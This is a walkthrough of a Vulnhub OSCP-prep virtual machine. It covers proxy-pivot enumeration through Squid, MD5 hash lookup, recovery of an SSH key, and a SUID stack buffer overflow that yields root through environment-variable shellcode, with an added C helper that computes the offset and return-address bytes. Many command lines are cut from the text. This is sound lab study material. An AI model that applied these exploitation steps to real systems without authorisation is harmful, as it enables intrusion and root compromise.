Vulnhub virtual machine; OSCP prep box. Enumeration pivots through a separate web-server (a Squid proxy) on the target to reach an internal web service; a buffer overflow in a SUID application then gives root.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission for. Use information at your own risk.
By continued reading, you acknowledge the aforementioned user risk/responsibilities.
Discover the VM on the network: netdiscover -r 192.168.56.0/24
Target: 192.168.56.117, verified on the VM's console:
This script offers a bit of a change from nmap and uses
Added the IP to
(It started freaking out on me; will have to come back to why.)
It looks as if we have two HTTP servers operating on ports
Nmap scan number 2: a more aggressive scan, which found the
Navigating to the first port, the server responds Forbidden.
Navigating to port
gives an error page that looks to leak some information about the application behind it:
OK, it looks like we are working with Squid: the error page's stylesheet is the standard "Stylesheet for Squid Error pages", so the application on this web-server is a Squid proxy.
Let's move on to port 8080, which was refusing our direct requests, by sending the request through the Squid proxy and asking for it as the local IP (127.0.0.1):
Nothing is spoofed here: the proxy runs on the target, so the web-server on 8080 now sees a client on its own loopback interface rather than our address, and its restriction to internal clients is bypassed.
Run gobuster through the proxy on port
The /littlesecrets-main directory is discovered.
Add the target IP + proxy port as an HTTP proxy in the browser and navigate to the directory.
We have a login page.
gobuster enumeration of files under it:
Let's try to get past this login page via
After a bit of time we are able to extract the
The hashes look like MD5 (32 hex characters). MD5 is a hash and cannot be decrypted, but an unsalted MD5 of a common password can be looked up in a precomputed table; a quick lookup at https://www.md5online.org/md5-decrypt.html gives us credentials.
Since it looks like we have a manage hash, let's try to SSH to the box.
Search for hidden files:
There looks to be an ultrasecret file and a note.txt.
cat both files:
We have an RSA private key (base64-encoded), and the note confirms what the key is for.
Decode the RSA key:
With the private key decoded, place it on our local box as ~/.ssh/pinkyv1 and chmod it to 600 (ssh refuses to use a key file that is readable by other users), then connect to the box as pinky with the private key.
We are now operating as pinky.
From the home directory we discover this
This binary echoes its argument back when executed, so it copies user-controlled input and could be vulnerable to an overflow.
Attempting to crash the binary with a long argument:
Segmentation fault: exactly what we were looking for.
The binary is also owned by root with the SUID bit set, so it runs with root's effective UID; any code we get it to execute runs as root.
- find where the application crashes
- find the offset to the saved return address
- insert our shellcode and redirect execution to it to take advantage of the overflow
Location of crash:
Use gdb to figure out what address the application crashes at.
This is a 64-bit binary, given the register layout (rip, rsp, rbp rather than eip, esp, ebp).
rip is still inside main.
We have reached the segmentation fault (application crash). Note that rip was not overwritten with 0x4141414141414141: on x86-64 a non-canonical return address makes the ret instruction fault before rip changes, which is why rip still points into main. The next step is to determine the location of the frame pointer.
This means that the overflow has occurred at
Next, examine the stack pointer: at the fault, $rsp points at the slot holding the overwritten return address, and the 55 "A"s found there are the tail of our input from that slot to the end, meaning the input ran 55 bytes past the start of the return-address slot.
Take the number of "A"s sent initially and subtract 55 from the total:
the remaining number, the offset to the return address, = 72.
Re-run under gdb with an argument of 72 "a"s followed by extra marker text, to confirm that 72 bytes fill the buffer exactly up to the return address and that the next 8 bytes take it over:
72 "a"s and then "bcdefghi", so "bcdefghi" (8 bytes, one 64-bit word) should be what lands at $rsp.
Disassemble main:
We are exploiting this call to strcpy, which copies the argument into a fixed-size stack buffer with no length check; that is the buffer overflow.
Here are our "A"s.
And here are the extra bytes we overwrote the return address at $rsp with. We need to point this return address at our shellcode.
The shellcode payload for x86-64 systems spawns a shell by pushing the /bin/sh string onto the stack and calling execve. It is provided at http://shell-storm.org/shellcode/files/shellcode-806.php along with the exploit-db link: https://www.exploit-db.com/exploits/36858
This leads us to getenv.c.
The idea is to place the shellcode in an environment variable, which is copied onto the target program's stack when it starts, and use this small program to find the variable's address so we can return into it.
Create a variable via export containing the shellcode from above. In the end getenv will return the address of the shellcode to use as the exploit's return address.
See the variable created in env:
After compiling getenv.c, run it against the variable so it reports where the variable sits in memory:
The result is our shellcode being placed at
Next, we run ./adminhelper with our initial padding of 72 "A"s followed by the return address of our shellcode, written in little-endian byte order (least significant byte first, as x86-64 stores it).
Our shellcode executes: the buffer overflow succeeds and drops us into a root shell because of the SUID bit on the
Upgrading the shell to a full interactive TTY:
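The three numbers that the exploit above depends on (the offset derived from the 55 "A"s at $rsp, the little-endian return address, and the getenv.c address estimate) as an added C example; this is not the writeup's code nor the VM's adminhelper, and it does not run any shellcode. The crash input length of 127 bytes and the 0x7fffffffe5c8 address are made-up illustrative values, and the "twice the program-name difference" correction is the rule of thumb from the classic getenv.c helper (assumed to be the one the writeup compiled), not a guarantee.

```c
/* Added example (not code from the writeup): the arithmetic behind the
 * adminhelper exploit, so the offset, return-address bytes and shellcode
 * address can be sanity-checked before running anything as root.
 * Assumed/made-up values: crash input of 127 "A"s, addresses below. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Step 1: offset to the saved return address.
 * After the crash, $rsp points at the overwritten return-address slot and
 * x/s $rsp shows the tail of our input from that slot to the end. If the
 * input had total_bytes "A"s and a_at_rsp of them are visible at $rsp,
 * the slot begins total_bytes - a_at_rsp bytes into the buffer. */
size_t offset_to_ret(size_t total_bytes, size_t a_at_rsp) {
    return total_bytes - a_at_rsp;
}

/* Step 2: build the argument: `offset` bytes of filler, then the shellcode
 * address in little-endian order (least significant byte first). Returns
 * the number of bytes written, excluding the NUL, or 0 if out is too small. */
size_t build_payload(uint8_t *out, size_t out_len, size_t offset, uint64_t ret_addr) {
    if (out_len < offset + 9) return 0;
    memset(out, 'A', offset);
    for (size_t i = 0; i < 8; i++)
        out[offset + i] = (uint8_t)(ret_addr >> (8 * i));
    out[offset + 8] = '\0';
    return offset + 8;
}

static uint8_t scratch[256];

/* Accessor for inspecting individual payload bytes; -1 when out of range. */
int payload_byte(size_t offset, uint64_t ret_addr, size_t i) {
    size_t n = build_payload(scratch, sizeof scratch, offset, ret_addr);
    return (n == 0 || i >= n) ? -1 : scratch[i];
}

/* Caveat: the payload travels as argv[1], a C string, and strcpy stops at
 * the first NUL. A canonical user-space address such as 0x00007fffffffe5c8
 * has two high zero bytes, so only the low six bytes plus the NUL are
 * copied; this still works because the original return address (a
 * 0x00007f... libc address) already had zeros in those two bytes. */
size_t payload_visible_len(size_t offset, uint64_t ret_addr) {
    if (build_payload(scratch, sizeof scratch, offset, ret_addr) == 0) return 0;
    return strlen((char *)scratch);
}

/* Step 3: estimate the variable's address inside the target. getenv.c's
 * rule of thumb: the address seen in the helper shifts by twice the
 * difference in program-name length between helper and target. Only
 * meaningful with ASLR off, the same environment, and the target launched
 * the same way (not under gdb, whose environment differs). If the estimate
 * is slightly off, a NOP sled in front of the shellcode absorbs the error. */
uint64_t predict_env_addr(uint64_t addr_in_helper, const char *helper_name, const char *target_name) {
    int64_t delta = (int64_t)strlen(helper_name) - (int64_t)strlen(target_name);
    return (uint64_t)((int64_t)addr_in_helper + 2 * delta);
}

int main(void) {
    size_t off = offset_to_ret(127, 55);   /* 72, as in the writeup */
    uint64_t sc = predict_env_addr(0x7fffffffe5c8ULL, "./getenv", "./adminhelper");
    uint8_t buf[256];
    size_t n = build_payload(buf, sizeof buf, off, sc);
    printf("offset=%zu shellcode=0x%llx return-address bytes:", off, (unsigned long long)sc);
    for (size_t i = off; i < n; i++) printf(" %02x", buf[i]);
    printf("\n");
    return 0;
}
```

The printed return-address bytes are what the final ./adminhelper argument must end with, so compare them against the value passed on the command line (via $'...' or printf) before running the SUID binary.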
Bring me the root!